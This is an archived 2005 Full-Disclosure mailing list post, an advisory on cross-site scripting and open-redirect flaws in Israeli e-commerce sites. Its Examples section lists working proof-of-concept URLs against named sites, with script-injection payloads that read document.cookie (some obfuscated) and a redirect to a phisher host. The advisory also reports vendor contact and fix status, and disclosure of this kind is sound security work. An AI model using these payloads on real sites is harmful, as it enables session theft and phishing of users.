lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: avivra at 012.net.il (Aviv Raff)
Subject: Leading Israeli e-commerce sites XSS
	vulnerabilities advisory


Leading Israeli e-commerce sites XSS vulnerabilities advisory


URL:  <http://www.raffon.net/advisories/commxss.html>
http://www.raffon.net/advisories/commxss.html
Date: January 10, 2005
Author: Aviv Raff 


Introduction

Many leading Israeli e-commerce sites are phishing enabled, and contain
pages which allow injecting code that can execute arbitrary scripts.



Technical Details

Many leading Israeli e-commerce sites generate dynamic HTML web pages using
user-submitted data, and data from other sources. Most of these sites do not
filter the data before presenting it to the user, and therefore are
vulnerable to Cross-Site Scripting. They allow injecting code that can
execute arbitrary scripts, steal the user's cookie, or display fake pages.
P1000 web site allows redirecting to external pages using a simple query
string input, which can be easily exploited by phishers.



Examples

NetAction: 
http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onlo
ad=alert(document.cookie)%20>
http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/s
pace.gif%20onload=alert(document.cookie)%20> 
http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/spa
ce.gif%20onload=alert(document.cookie)%20>

P1000:
http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com

Wallashops:
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>aler
t(document.cookie)</script>
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseove
r=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20"

Zap:
http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</scr
ipt>

GetIt:
http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.co
okie)</script>

Sakal Online:
http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord=
<script>alert(document.cookie)</script>

NfcShop:
http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script>

Daka90:
http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail
='><script>alert(document.cookie)</script>

Olsale:
http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document.
cookie)</script>&type=1&rtype=1

Issta:
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&pr
ice_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to
_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&pr
ice_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004
&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml 
Parsi:
http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)<
/script>
http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_do
t.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20>

Arkia:
http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="htt
p://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.coo
kie)"></iframe>

Printmall:
https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(do
cument.cookie)</script>

One (This is actually a leading sport website, but it has a paid premium
section and also contains links to other e-commerce sites):
http://www.one.co.il/one/search.asp?data=<script>alert(document.cookie)</scr
ipt>
http://www.one.co.il/search/MoreArticals.asp?data=<script>alert(document.coo
kie)</script>



Solutions

All of the sites were contacted via email, or a suggestion form on
27/12/2004.
Netaction, P1000, GetIt, Daka90, Arkia and Printmall sites have already
fixed the vulnerabilities.
Wallashops, Issta and Parsi sites are partly fixed.
Other sites are still vulnerable, and one should be careful following a link
to those sites, or give confidential information.



Disclaimer: The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.


-- Copyright C 2004-2005 Aviv Raff. --

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050110/733c6e5b/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ